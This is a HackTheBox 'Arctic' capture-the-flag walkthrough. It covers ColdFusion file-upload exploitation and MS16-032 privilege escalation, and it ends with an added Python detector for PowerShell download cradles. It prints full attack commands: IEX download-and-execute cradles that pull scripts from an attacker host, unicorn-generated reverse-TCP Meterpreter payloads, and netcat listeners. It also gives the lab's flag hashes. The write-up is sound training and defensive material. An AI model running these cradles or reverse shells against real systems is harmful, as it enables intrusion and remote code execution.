Arctic – HackTheBox

Arctic 10.10.10.11

Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software Versions Running

135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC

Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor ‘CurrentFolder’ File Upload and Execute vulnerability.


Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP scan.

Web application on port 8500.

Directory search.

The administrator page gives version 8.

Searchsploit.

Found the Metasploit version of the exploit.

Set options as follows.

Start a Burp proxy listener on 127.0.0.1:8500 and check it works in the browser.

Capture the request in Burp.

Check the filename it is writing to.

Navigate to that file via the browser, with your nc listener set up on port 4444.

Gather system info etc.

Grab the user file.

Execute Sherlock.ps1 after copying it to your working directory and starting your web server. The same download cradle was used to try Invoke-MS16032.ps1:

echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -

This did not work, so get a Meterpreter shell instead.

git clone the unicorn repository (link not preserved in this copy)

python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445

msfconsole -r unicorn.rc

cat powershell_attack.txt > exploit.html

Open exploit.html in nano and delete from the leading "powershell" through to "sv (including the single quote), and also the quote at the end.

Copy it to your web server.

Run the following on Arctic:

powershell "iex(new-object net.webclient).downloadstring('<URL of exploit.html on your web server>')"
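The two download-and-execute cradles used above are exactly the command lines a defender wants to alert on. This is an added example, not part of the original writeup: it flags such cradles in constructed process-creation command lines, and the sample lines, the exploit.html URL and the function names are my own assumptions.

```python
import re

# Constructed sample of process-creation command lines (not taken from the
# walkthrough's screenshots). Lines 0 and 1 mirror the two cradles used above;
# lines 2 and 3 are benign PowerShell usage that must not be flagged.
SAMPLE_CMDLINES = [
    'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -',
    'powershell "iex(new-object net.webclient).downloadstring(\'http://10.10.14.2/exploit.html\')"',
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1',
]

# The three components of a download-and-execute cradle. PowerShell is
# case-insensitive, so every pattern is compiled with re.I.
CRADLE_PARTS = {
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "downloadstring": re.compile(r"\.downloadstring\s*\(", re.I),
}
# "powershell ... -" reads the script from stdin: the powershell.exe process
# itself then shows only "-noprofile -", and the cradle is visible only in the
# parent (cmd.exe/echo) command line or in script block logging (Event 4104).
STDIN_SCRIPT = re.compile(r"powershell(\.exe)?\b[^|]*\s-\s*$", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def classify(cmdline):
    """Return details of a cradle found in cmdline, or None if it looks benign."""
    parts = [name for name, rx in CRADLE_PARTS.items() if rx.search(cmdline)]
    if len(parts) < 3:  # require IEX + WebClient + DownloadString together
        return None
    return {
        "parts": parts,
        "stdin_script": bool(STDIN_SCRIPT.search(cmdline)),
        "urls": URL.findall(cmdline),
    }


def find_cradles(cmdlines):
    """Return (index, details) for every flagged command line."""
    hits = []
    for i, cmdline in enumerate(cmdlines):
        details = classify(cmdline)
        if details:
            hits.append((i, details))
    return hits


if __name__ == "__main__":
    for i, details in find_cradles(SAMPLE_CMDLINES):
        print(f"line {i}: {details}")
```

Because the stdin form leaves powershell.exe's own command line almost empty, run this over the parent process command line (Event 4688 / Sysmon Event 1) and over script block logs, not only over powershell.exe events.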

Check Meterpreter.

Run the local exploit suggester (32 bit).

This ran as 32 bit, so switch to Meterpreter and migrate to a 64 bit process.

Only one suggestion comes back as 64 bit.

Set your options as follows:

Run the exploit to get a SYSTEM shell.

Root.txt